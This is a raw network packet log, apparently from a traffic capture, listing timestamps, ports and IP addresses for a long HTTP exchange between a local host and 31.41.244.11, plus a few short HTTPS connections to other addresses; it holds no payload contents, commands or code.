Dec 22, 2024 02:16:52.036956072 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.037153006 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.037199020 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.037597895 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.037689924 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.037704945 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.037731886 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.037754059 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.037945032 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.038456917 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.038487911 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.038503885 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.038505077 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.038526058 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.038547993 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.038724899 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.039216042 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.039263010 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.039271116 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.039287090 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.039331913 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.039510012 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.039555073 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.039952040 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.040056944 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.040072918 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.040107012 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.040119886 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.040277004 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.040738106 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.040798903 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.040829897 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.040847063 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.040896893 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.041060925 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.041537046 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.041596889 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.041635036 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.041651011 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.041703939 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.041851044 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.042309046 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.042372942 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.042407036 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.042423964 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.042484045 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.042627096 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.043127060 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.043190002 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.043210983 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.043227911 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.043282032 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.043431997 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.043900013 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.043962955 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.043978930 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.043994904 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.044070959 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.044198990 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.044447899 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.044647932 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.044723034 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.044766903 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.044781923 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.044841051 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.068357944 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.068408966 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.068423986 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.068486929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.068732977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.068768024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.068790913 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.068818092 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.068831921 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.069008112 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.069060087 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.102166891 CET	443	49876	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:52.102447033 CET	443	49876	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:52.102544069 CET	49876	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:52.102689028 CET	49876	443	192.168.2.4	104.21.67.146
Dec 22, 2024 02:16:52.102704048 CET	443	49876	104.21.67.146	192.168.2.4
Dec 22, 2024 02:16:52.218766928 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.218909979 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.218926907 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.218950033 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.218991995 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.219189882 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.219230890 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.219336033 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.219352961 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.219378948 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.219404936 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.219645023 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.219686985 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.219789982 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.219830990 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.219928980 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.219944954 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.219974995 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.219986916 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.220077038 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.220153093 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.220515966 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.220577955 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.220654011 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.220670938 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.220701933 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.220714092 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.221210003 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.221225977 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.221241951 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.221261024 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.221272945 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.221297979 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.221493959 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.221534967 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.221925020 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.222057104 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.222076893 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.222094059 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.222126007 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.222138882 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.222256899 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.222296953 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.222733974 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.222749949 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.222783089 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.222795010 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.222879887 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.222894907 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.222934961 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.223455906 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.223623037 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.223639011 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.223679066 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.223690033 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.223792076 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.224133015 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.224400997 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.224416971 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.224432945 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.224442959 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.224456072 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.224474907 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.224663973 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.224704027 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.225037098 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.225078106 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.225281954 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.225298882 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.225323915 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.225337029 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.225430965 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.225470066 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.225842953 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.225905895 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.226012945 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.226028919 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.226075888 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.226136923 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.226248026 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.226612091 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.226701975 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.226826906 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.226843119 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.226872921 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.226893902 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.227058887 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.227128029 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.227408886 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.227442026 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.227581024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.227597952 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.227612972 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.227623940 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.227637053 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.227658987 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.228296041 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.228312016 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.228326082 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.228349924 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.228379011 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.228584051 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.228629112 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.228713989 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.228729963 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.228746891 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.228754997 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.228765011 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.228770971 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.228787899 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.228801012 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.228962898 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.228996992 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.228997946 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.229013920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.229059935 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.229296923 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.229368925 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.231127024 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.231257915 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.231272936 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.231297016 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.231311083 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.231465101 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.231731892 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.231959105 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.232059002 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.232075930 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.232108116 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.232136965 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.232397079 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.232479095 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.232672930 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.232753038 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.232825994 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.232841969 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.232857943 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.232861996 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.232875109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.232884884 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.232897997 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.232917070 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.233000994 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.233019114 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.233048916 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.233072042 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.233336926 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.233402014 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.233772039 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.233794928 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.233812094 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.233829021 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.233843088 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.233846903 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.233863115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.233872890 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.233880043 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.233887911 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.233911991 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.233958006 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.234040022 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.234424114 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.234467030 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.234513044 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.234535933 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.234555006 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.234568119 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.234760046 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.234853983 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.235248089 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.235295057 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.235301971 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.235337019 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.235342026 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.235419035 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.235543966 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.235589027 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.236053944 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.236078978 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.236095905 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.236121893 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.236140013 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.236363888 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.236764908 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.236815929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.236849070 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.236862898 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.236907005 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.260536909 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.260624886 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.260863066 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.260879993 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.260896921 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.260926008 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.260951996 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.260987997 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.261003971 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.261049986 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.261300087 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.262618065 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.303642988 CET	443	49874	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:52.304497957 CET	49874	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:52.304507971 CET	443	49874	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:52.304934978 CET	49874	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:52.305726051 CET	49874	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:52.305764914 CET	443	49874	216.58.208.238	192.168.2.4
Dec 22, 2024 02:16:52.305814028 CET	49874	443	192.168.2.4	216.58.208.238
Dec 22, 2024 02:16:52.315887928 CET	49884	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:52.315979958 CET	443	49884	142.250.181.65	192.168.2.4
Dec 22, 2024 02:16:52.316116095 CET	49884	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:52.316320896 CET	49884	443	192.168.2.4	142.250.181.65
Dec 22, 2024 02:16:52.316355944 CET	443	49884	142.250.181.65	192.168.2.4
Dec 22, 2024 02:16:52.410243034 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.410478115 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.410492897 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.410509109 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.410554886 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.410588980 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.410598993 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.410614014 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.410654068 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.410850048 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.410890102 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.411164045 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.411276102 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.411320925 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.411370993 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.411402941 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.411411047 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.411421061 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.411439896 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.411453009 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.412029982 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.412070036 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.412159920 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.412177086 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.412216902 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.412574053 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.412636042 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.412652016 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.412672043 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.412684917 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.412978888 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.413017988 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.413391113 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.413430929 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.413454056 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.413470984 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.413492918 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.413502932 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.413798094 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.413836002 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.414160967 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.414199114 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.414233923 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.414252043 CET	80	49872	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:52.414273024 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.414282084 CET	49872	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:52.414448023 CET	80	49872	31.41.244.11	192.168.2.4
